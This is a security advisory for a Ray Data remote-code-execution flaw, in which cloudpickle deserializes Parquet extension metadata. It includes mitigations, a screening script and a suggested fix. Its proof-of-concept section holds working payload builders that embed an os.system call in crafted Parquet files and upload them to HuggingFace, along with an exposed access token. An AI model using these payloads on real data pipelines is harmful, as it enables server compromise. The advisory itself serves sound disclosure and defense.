Ray Data CVE-2026-41486

HIGH
Code Injection (CWE-94)
2026-04-24 · https://github.com/ray-project/ray · GHSA-mw35-8rx3-xf9r

Lifecycle Timeline

  1. Analysis Generated: Apr 24, 2026, 16:31 (vuln.today)

Description (NVD)

Remote Code Execution via Parquet Arrow Extension Type Deserialization

Summary

Ray Data registers custom Arrow extension types (ray.data.arrow_tensor, ray.data.arrow_tensor_v2, ray.data.arrow_variable_shaped_tensor) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls __arrow_ext_deserialize__ on the field's metadata bytes. Ray's implementation passes these bytes directly to cloudpickle.loads(), giving an attacker arbitrary code execution during schema parsing, before any row data is read.

In May 2024, Ray fixed a related vulnerability in PyExtensionType-based extension types (issue #41314, PR #45084). In July 2025, PR #54831 introduced cloudpickle.loads() into the replacement extension types' deserialization path, reintroducing the same class of vulnerability.

Note: Source links in this report are pinned to the Ray 2.54.0 release commit (48bd1f8fa4) for stable line references. We also re-verified the same vulnerable code paths on current master as of March 17, 2026.

Details

Extension type registration

Ray Data registers three Arrow extension types globally in PyArrow:

python
# python/ray/data/_internal/tensor_extensions/arrow.py:1603-1605
pa.register_extension_type(ArrowTensorType((0,), pa.int64()))
pa.register_extension_type(ArrowTensorTypeV2((0,), pa.int64()))
pa.register_extension_type(ArrowVariableShapedTensorType(pa.int64(), 0))

Registration happens at module load time (__init__.py:94-95), and any use of ray.data triggers it. Once registered, PyArrow automatically calls __arrow_ext_deserialize__ whenever it encounters these extension type names in any Parquet file's schema, including files from untrusted sources.
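
As a quick way to confirm the side effect, and as a stopgap for processes that read untrusted Parquet but do not need tensor columns, the types can be unregistered again. This is our suggestion, not an official Ray mitigation, and it breaks Ray Data's own tensor support in that process.

python
# Diagnostic / stopgap sketch (our suggestion, not an official Ray mitigation).
# Importing ray.data is what performs the global registration; unregistering
# afterwards removes the cloudpickle deserialization hook, at the cost of
# breaking Ray Data's tensor columns in this process.
import pyarrow as pa
import ray.data  # noqa: F401 -- the import side effect registers the types

for name in (
    "ray.data.arrow_tensor",
    "ray.data.arrow_tensor_v2",
    "ray.data.arrow_variable_shaped_tensor",
):
    # unregister_extension_type should fail if the name is not registered,
    # so success here confirms the import side effect.
    pa.unregister_extension_type(name)
    print(f"unregistered {name}")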

The code path to cloudpickle.loads()

All three extension types inherit from ArrowExtensionSerializeDeserializeCache, whose __arrow_ext_deserialize__ method (arrow.py:176-179) delegates to subclass methods that ultimately call _deserialize_with_fallback():

python
# python/ray/data/_internal/tensor_extensions/arrow.py:84-96
def _deserialize_with_fallback(serialized: bytes, field_name: str = "data"):
    """Deserialize data with cloudpickle first, fallback to JSON."""
    try:
        # Try cloudpickle first (new format)
        return cloudpickle.loads(serialized)  # <-- arbitrary code execution
    except Exception:
        # Fallback to JSON format (legacy)
        try:
            return json.loads(serialized)
        except json.JSONDecodeError:
            raise ValueError(
                f"Unable to deserialize {field_name} from {type(serialized)}"
            )

The serialized bytes come directly from the Parquet file's field-level metadata (ARROW:extension:metadata) with no validation. cloudpickle.loads() is tried first, meaning a crafted payload will always be executed before the safe JSON fallback is reached.
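
For context, a standalone mimic of that ordering (our illustration, not Ray's code) shows why the JSON fallback offers no protection: attacker-controlled bytes always reach cloudpickle.loads() before JSON is even attempted.

python
# Standalone mimic of the try-cloudpickle-first ordering (illustration only).
import json

import cloudpickle

def deserialize_like_ray(serialized: bytes):
    try:
        # Attacker-controlled bytes hit cloudpickle first, unconditionally.
        return cloudpickle.loads(serialized)
    except Exception:
        # The "safe" JSON path is only reached if unpickling fails.
        return json.loads(serialized)

print(deserialize_like_ray(cloudpickle.dumps((3, 224, 224))))  # new-format shape -> (3, 224, 224)
print(deserialize_like_ray(b"[3, 224, 224]"))                  # legacy JSON shape -> [3, 224, 224]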

For ArrowTensorType, the call chain is:

__arrow_ext_deserialize__(cls, storage_type, serialized)       # arrow.py:176
  -> _arrow_ext_deserialize_cache(serialized, value_type)      # arrow.py:178
    -> _arrow_ext_deserialize_compute(serialized, value_type)  # arrow.py:652
      -> _deserialize_with_fallback(serialized, "shape")       # arrow.py:653
        -> cloudpickle.loads(serialized)                       # arrow.py:88   <-- RCE

ArrowTensorTypeV2 (arrow.py:679-680) and ArrowVariableShapedTensorType (arrow.py:1076-1077) follow the same pattern.

Why the existing mitigation doesn't help

After issue #41314, Ray added check_for_legacy_tensor_type() in parquet_datasource.py:146-170 to block the old PyExtensionType-based tensor types:

python
# python/ray/data/_internal/datasource/parquet_datasource.py:146-170
def check_for_legacy_tensor_type(schema):
    """Check for the legacy tensor extension type and raise an error if found.

    Ray Data uses an extension type to represent tensors in Arrow tables. Previously,
    the extension type extended `PyExtensionType`. However, this base type can expose
    users to arbitrary code execution. To prevent this, we don't load the type by
    default.
    """
    for name, type in zip(schema.names, schema.types):
        if isinstance(type, pa.UnknownExtensionType) and isinstance(
            type, pa.PyExtensionType
        ):
            raise RuntimeError(...)

This guard checks for PyExtensionType / UnknownExtensionType. It does not check for the currently-registered ray.data.arrow_tensor types, which are the ones that call cloudpickle.loads(). Additionally, the check runs after PyArrow has already deserialized the schema, so even if it checked for the current types, the code execution would have already occurred.
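
The ordering problem is easy to demonstrate: merely parsing the schema is enough to fire the payload, so any guard placed after schema deserialization is too late. The snippet below is an illustration, not part of the advisory's PoC, and assumes the crafted.parquet file produced in PoC 1 below exists in the working directory.

python
# Illustration only: assumes crafted.parquet from PoC 1 below exists and that
# ray.data has been imported (which registers the extension types). No row
# data is read; schema conversion alone should invoke
# __arrow_ext_deserialize__ and therefore cloudpickle.loads().
import ray.data  # noqa: F401 -- registers ray.data.arrow_tensor et al.
import pyarrow.parquet as pq

schema = pq.read_schema("crafted.parquet")  # payload executes here
print(schema)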

Outside Ray's documented threat model

Ray's security documentation states that Ray relies on network isolation and "extensively uses cloudpickle." This vulnerability does not require cluster access. The payload arrives through a Parquet file from cloud storage, a data lake, HuggingFace, or a shared filesystem. A perfectly firewalled Ray cluster is vulnerable if it reads a crafted file.

Impact

  • Affected versions: Ray 2.49.0 through 2.54.0 (latest release as of March 2026). The vulnerable _deserialize_with_fallback function with cloudpickle.loads() was introduced in commit f6d21db1a4 (PR #54831, July 2025), first released in Ray 2.49.0.
  • Affected configurations: Any process that uses Ray Data and reads Parquet files. The extension types are registered globally in PyArrow, so all Parquet reads in the process are affected, including ray.data.read_parquet(), pyarrow.parquet.read_table(), pandas.read_parquet(), etc.
  • Attacker prerequisites: The attacker must place a crafted Parquet file where a Ray Data pipeline reads it. No authentication or cluster access is required. The Parquet file must contain a column with a ray.data.arrow_tensor (or v2, or variable-shaped) extension type name, which makes this a targeted attack against Ray Data users.
  • CIA impact: Arbitrary command execution as the Ray worker process user, resulting in full server compromise.
  • Severity: Critical

Attack scenarios

  1. HuggingFace datasets: Ray's documentation recommends reading Parquet datasets from HuggingFace using ray.data.read_parquet("hf://datasets/...", filesystem=HfFileSystem()). Anyone can create a HuggingFace dataset containing a crafted Parquet file. A tensor column with ray.data.arrow_tensor metadata is normal for an ML dataset, as tensor columns are a core Ray Data feature. We verified this scenario end-to-end with a private HuggingFace dataset (see PoC below).
  2. Multi-tenant ML platforms: Organizations running shared Ray clusters where multiple teams submit data processing jobs. If one team can write Parquet files to shared storage that another team reads, the writer can execute arbitrary code in the reader's context.
  3. Compromised data pipelines: An upstream data producer writes Parquet files with crafted tensor column metadata. The payload survives because standard Parquet tools preserve extension metadata transparently, as the inspection sketch below illustrates.
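
One practical screening step is to inspect field metadata for the Ray extension names before any Ray-aware process touches a file. The sketch below is our own suggestion, not part of Ray; it assumes it runs in a clean process that has never imported ray.data, so the extension types are unregistered and PyArrow should leave the raw ARROW:extension:* keys on the field instead of calling __arrow_ext_deserialize__ on them.

python
# Screening sketch (our suggestion, not part of Ray). Run in a process that
# has NOT imported ray.data: with the extension types unregistered, PyArrow
# keeps the raw ARROW:extension:* keys in the field metadata rather than
# deserializing them.
import sys

import pyarrow.parquet as pq

SUSPECT_NAMES = {
    b"ray.data.arrow_tensor",
    b"ray.data.arrow_tensor_v2",
    b"ray.data.arrow_variable_shaped_tensor",
}

def flag_ray_tensor_fields(path: str) -> list:
    hits = []
    for field in pq.read_schema(path):
        meta = field.metadata or {}
        if meta.get(b"ARROW:extension:name") in SUSPECT_NAMES:
            hits.append(field.name)
    return hits

if __name__ == "__main__":
    flagged = flag_ray_tensor_fields(sys.argv[1])
    print(f"fields carrying Ray tensor extension metadata: {flagged or 'none'}")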

PoC

We provide two reproductions: a minimal local PoC and a full end-to-end scenario via HuggingFace.

Prerequisites: Python 3.12+ and uv (curl -LsSf https://astral.sh/uv/install.sh | sh).

PoC 1: Local file

Creates a valid Parquet file with a tensor column whose extension metadata contains a crafted cloudpickle payload. Reading the file with Ray Data triggers code execution during schema parsing.

1. Create the Parquet file:

bash
cat > craft_parquet.py << 'SCRIPT'
import cloudpickle
import pyarrow as pa
import pyarrow.parquet as pq

COMMAND = "id > /tmp/ray-tensor-rce-proof"

class Trigger:
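    # Unpickling a Trigger evaluates an expression that runs COMMAND via
    # os.system and then evaluates to (1,), so cloudpickle.loads() returns a
    # harmless-looking tuple instead of raising.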
    def __reduce__(self):
        return (eval, (f"(__import__('os').system({COMMAND!r}), (1,))[1]",))

storage_type = pa.list_(pa.int64())
schema = pa.schema([
    pa.field("tensor", storage_type, metadata={
        b"ARROW:extension:name": b"ray.data.arrow_tensor",
        b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
    }),
    pa.field("id", pa.int64()),
    pa.field("text", pa.string()),
])
table = pa.Table.from_arrays([
    pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
    pa.array([1, 2]),
    pa.array(["hello", "world"]),
], schema=schema)
pq.write_table(table, "crafted.parquet")
print("Created crafted.parquet")
SCRIPT

uv run --with 'cloudpickle,pyarrow' python craft_parquet.py

2. Read it with Ray Data:

bash
rm -f /tmp/ray-tensor-rce-proof

uv run --with 'ray[data]' python -c "
import ray.data
ray.data.read_parquet('crafted.parquet')
"

cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' - confirms code execution

PoC 2: End-to-end via HuggingFace

This demonstrates the realistic attack scenario: a crafted Parquet file hosted as a HuggingFace dataset, read by a Ray cluster following Ray's own documentation.

We uploaded a crafted Parquet file to a private HuggingFace dataset at antiproof/parquet-tensor-disclosure. The file looks like a normal ML dataset with tensor, id, and text columns. The read-only token below gives access.

Upload script (for reference, this is how we seeded the dataset):

bash
cat > upload_dataset.py << 'SCRIPT'
# /// script
# requires-python = ">=3.10"
# dependencies = ["cloudpickle", "pyarrow", "huggingface_hub"]
# ///
"""Upload a crafted Parquet file to a HuggingFace dataset.

Prerequisites: huggingface-cli login (with a write token)
Usage: uv run upload_dataset.py <repo_id> <command>
"""
import sys, tempfile
from pathlib import Path
import cloudpickle, pyarrow as pa, pyarrow.parquet as pq
from huggingface_hub import HfApi

def build_parquet(output, command):
    class Trigger:
        def __reduce__(self):
            return (eval, (f"(__import__('os').system({command!r}), (1,))[1]",))

    storage_type = pa.list_(pa.int64())
    schema = pa.schema([
        pa.field("tensor", storage_type, metadata={
            b"ARROW:extension:name": b"ray.data.arrow_tensor",
            b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
        }),
        pa.field("id", pa.int64()),
        pa.field("text", pa.string()),
    ])
    table = pa.Table.from_arrays([
        pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
        pa.array([1, 2]),
        pa.array(["hello", "world"]),
    ], schema=schema)
    pq.write_table(table, str(output))

repo_id, command = sys.argv[1], sys.argv[2]
with tempfile.TemporaryDirectory() as tmpdir:
    parquet = Path(tmpdir) / "train.parquet"
    build_parquet(parquet, command)
    HfApi().upload_file(
        path_or_fileobj=str(parquet),
        path_in_repo="data/train.parquet",
        repo_id=repo_id, repo_type="dataset",
    )
print(f"Uploaded to https://huggingface.co/datasets/{repo_id}")
SCRIPT
# We ran:
# uv run upload_dataset.py antiproof/parquet-tensor-disclosure 'id > /tmp/ray-tensor-rce-proof'

Reproduce (reads the dataset from HuggingFace, no local files needed):

bash
rm -f /tmp/ray-tensor-rce-proof

HF_TOKEN=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 \
uv run --with 'ray[data],huggingface_hub' python -c "
import ray.data
from huggingface_hub import HfFileSystem

ray.data.read_parquet(
    'hf://datasets/antiproof/parquet-tensor-disclosure/data/train.parquet',
    filesystem=HfFileSystem(),
)
"

cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' - confirms code execution via HuggingFace dataset

The token above is read-only. The dataset is private to prevent unintended exposure.

Suggested fix

The extension metadata stores simple values (a shape tuple like (3, 224, 224) or an ndim integer). These do not require cloudpickle.

  1. Replace cloudpickle.loads() in _deserialize_with_fallback() with json.loads(). The tensor shape and ndim are JSON-serializable. For backward compatibility with files written using the current cloudpickle format, gate cloudpickle.loads() behind an opt-in environment variable (following the pattern already established with RAY_DATA_AUTOLOAD_PYEXTENSIONTYPE).
  2. Serialize new extension type metadata as JSON by default. json.dumps([3, 224, 224]) carries the same information as cloudpickle.dumps((3, 224, 224)), without the code execution risk. A sketch combining this with the opt-in fallback from point 1 follows this list.
  3. Add a security note to read_parquet() documentation explaining that Parquet files from untrusted sources can execute arbitrary code when tensor extension types are registered.
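
The following is a minimal sketch of how points 1 and 2 could fit together. It is our illustration, not Ray's patch; the RAY_DATA_ALLOW_PICKLE_TENSOR_METADATA variable name and the helper functions are hypothetical.

python
# Sketch of a JSON-first metadata scheme (our illustration, not Ray's patch).
# The environment-variable name and helper names are hypothetical.
import json
import os

import cloudpickle

# Opt-in escape hatch for files written with the current cloudpickle format.
_ALLOW_PICKLE = os.environ.get("RAY_DATA_ALLOW_PICKLE_TENSOR_METADATA") == "1"

def serialize_metadata(value) -> bytes:
    # Shapes and ndim are plain ints/tuples, so JSON carries them losslessly.
    return json.dumps(value).encode("utf-8")

def deserialize_metadata(serialized: bytes, field_name: str = "data"):
    try:
        return json.loads(serialized)
    except (json.JSONDecodeError, UnicodeDecodeError):
        if _ALLOW_PICKLE:
            # Legacy cloudpickle format, readable only when explicitly opted in.
            return cloudpickle.loads(serialized)
        raise ValueError(
            f"Refusing to unpickle {field_name} metadata; set "
            "RAY_DATA_ALLOW_PICKLE_TENSOR_METADATA=1 to read legacy files."
        )

# Example: a (3, 224, 224) image-tensor shape round-trips through JSON.
assert tuple(deserialize_metadata(serialize_metadata([3, 224, 224]))) == (3, 224, 224)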

Please contact [email protected] with any questions about this disclosure policy or related security research.

Analysis (AI)

Remote code execution in Ray Data 2.49.0-2.54.0 allows attackers to execute arbitrary Python code by crafting malicious Parquet files containing Ray tensor extension types. When Ray Data reads these files, it deserializes untrusted metadata using cloudpickle.loads() without validation, triggering code execution during schema parsing before any data is read. …


Remediation (AI)

Within 24 hours: Identify all systems running Ray Data 2.49.0-2.54.0 using pip show ray and inventory which versions are in production or development. Within 7 days: Upgrade to Ray Data 2.55.0 or later once available from the vendor, or implement immediate network isolation of Ray clusters and disable Parquet ingestion from untrusted sources. …

